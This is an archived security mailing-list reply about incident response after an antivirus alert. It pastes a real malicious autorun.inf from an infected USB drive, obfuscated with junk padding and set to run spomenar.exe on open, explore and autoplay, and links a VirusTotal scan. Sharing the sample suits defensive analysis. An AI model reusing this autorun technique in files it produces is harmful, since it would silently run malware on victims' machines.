Home page logo
/

pauldotcom logo PaulDotCom mailing list archives

Re: Incident Response
From: Craig Freyman <craigfreyman () gmail com>
Date: Thu, 1 Jul 2010 07:58:25 -0600

Not a false positive. Someone used a nasty USB drive that had an autorun
virus on it. The autorun.inf had this in it:

l~-??A?<K??#?Ê??ed?ª?üXÜ??ÁüFl?æ?eëX?r?:M?à???Ñ?çs?Ç?Oü?EF??ëÓ??ÚÞÊN?d=?ú??[Y?????mÈm!Ã???çñvè?y?Êv_????É-/?Is?ù?,[
[autorun
;e???V
open=trikfx/spomenar.exe
;Þm÷?Ç
icon=%SystemRoot%\system32\SHELL32.dll,4
;X]doÝ??a
action=Open folder to view files using Windows Explorer
;?ëë$???µ]
shell\\open\\\command=trikfx/spomenar.exe
;Là?ÿÜ??Üü`ásáµ????Dþ?é'?µ??rm?ò?
shell\\explore\\command=trikfx/spomenar.exe
;??àg'æë?
useautoplay=1

VirusTotal for this file:
http://www.virustotal.com/analisis/e22b8e9b4fbdb876904373e647306a3f0a8d2c5bbb50e708a87464c83c962dba-1277992532


On Wed, Jun 30, 2010 at 4:06 PM, Mike Patterson <mike () snowcrash ca> wrote:

On 10-06-30 12:05 PM, Craig Freyman wrote:
When the AV flags a virus, what steps should you take to handle the
situation?

I would assume the following would be important to figure out:
[...]
   - ??

First and foremost: is this a false positive?

Other than that, Josh Little's response is good.

Mike
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault